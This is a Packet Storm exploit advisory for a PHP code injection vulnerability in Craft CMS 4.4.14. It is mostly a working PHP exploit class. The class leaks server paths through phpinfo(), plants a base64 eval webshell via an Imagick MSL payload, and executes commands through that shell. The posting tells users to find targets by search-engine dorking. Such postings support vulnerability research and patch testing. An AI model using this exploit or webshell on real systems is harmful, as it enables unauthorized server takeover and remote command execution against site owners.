

Craft CMS 4.4.14 Code Injection

Craft CMS version 4.4.14 suffers from a PHP code injection vulnerability.

Packet Storm
=============================================================================================================================================| # Title     : Craft CMS 4.4.14 Code Injection Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    :                                                                                                       |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 116 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass CraftCMSExploit {    private $target_uri;    private $webshell;    private $config = ['upload_tmp_dir' => null, 'document_root' => null];    private $post_param;    private $get_param;    public function __construct($target_uri, $webshell = '') {        $this->target_uri = $target_uri;        $this->webshell = $webshell ? $webshell : $this->generateRandomString(8, 16) . '.php';        $this->post_param = $this->generateRandomString(1, 8);        $this->get_param = $this->generateRandomString(1, 8);    }    public function check_phpinfo() {        // Sends a crafted request to extract upload_tmp_dir and document_root from phpinfo()        $data = http_build_query([            'action' => 'conditions/render',            'configObject[class]' => 'craft\\elements\\conditions\\ElementCondition',            'config' => '{"name":"configObject","as ":{"class":"\\\GuzzleHttp\\\Psr7\\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'        ]);        $response = $this->sendPostRequest($this->target_uri, $data);        if ($response) {            $this->parsePHPInfo($response);        }    }    private function parsePHPInfo($response) {        // Parses the phpinfo() HTML response to find upload_tmp_dir and document_root        if (preg_match('/upload_tmp_dir.+<td class="v">(.*)<\/td>/i', $response, $matches)) {            $this->config['upload_tmp_dir'] = $matches[1] == 'no value' ? '/tmp' : trim($matches[1]);        }        if (preg_match('/DOCUMENT_ROOT.+<td class="v">(.*)<\/td>/i', $response, $matches)) {            $this->config['document_root'] = trim($matches[1]);        }    }    public function upload_webshell() {        // Generates an XML payload to upload the webshell via Imagick MSL        $payload = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>        <image>            <read filename=\"caption:<?php @eval(base64_decode(\$_POST['{$this->post_param}'])); ?>\" />            <write filename=\"info:{$this->config['document_root']}/{$this->webshell}\" />        </image>";        $form_data = [            'action' => 'conditions/render',            'configObject[class]' => 'craft\\elements\\conditions\\ElementCondition',            'config' => '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/dev/null"}}}',            'payload' => $payload        ];        $response = $this->sendMultipartPostRequest($this->target_uri, $form_data);        return strpos($response, '502') !== false;    }    public function execute_command($cmd) {        // Executes a command on the server via the uploaded webshell        $payload = base64_encode($cmd);        $data = http_build_query([$this->post_param => $payload]);        return $this->sendPostRequest($this->target_uri . '/' . $this->webshell, $data);    }    private function sendPostRequest($uri, $data) {        $options = [            'http' => [                'header' => "Content-type: application/x-www-form-urlencoded\r\n",                'method' => 'POST',                'content' => $data,            ],        ];        $context = stream_context_create($options);        return file_get_contents($uri, false, $context);    }    private function sendMultipartPostRequest($uri, $data) {        // Sends a multipart form-data POST request        $boundary = uniqid();        $delimiter = '------' . $boundary;        $post_data = $this->buildMultipartData($data, $delimiter);        $options = [            'http' => [                'header' => "Content-Type: multipart/form-data; boundary=" . $boundary . "\r\n",                'method' => 'POST',                'content' => $post_data,            ],        ];        $context = stream_context_create($options);        return file_get_contents($uri, false, $context);    }    private function buildMultipartData($data, $delimiter) {        $post_data = '';        foreach ($data as $name => $content) {            $post_data .= "--$delimiter\r\n";            $post_data .= "Content-Disposition: form-data; name=\"$name\"\r\n\r\n";            $post_data .= "$content\r\n";        }        $post_data .= "--$delimiter--\r\n";        return $post_data;    }    private function generateRandomString($min, $max) {        $length = rand($min, $max);        return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, $length);    }}// Usage$exploit = new CraftCMSExploit('');$exploit->check_phpinfo();if ($exploit->upload_webshell()) {    echo $exploit->execute_command('whoami');}?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

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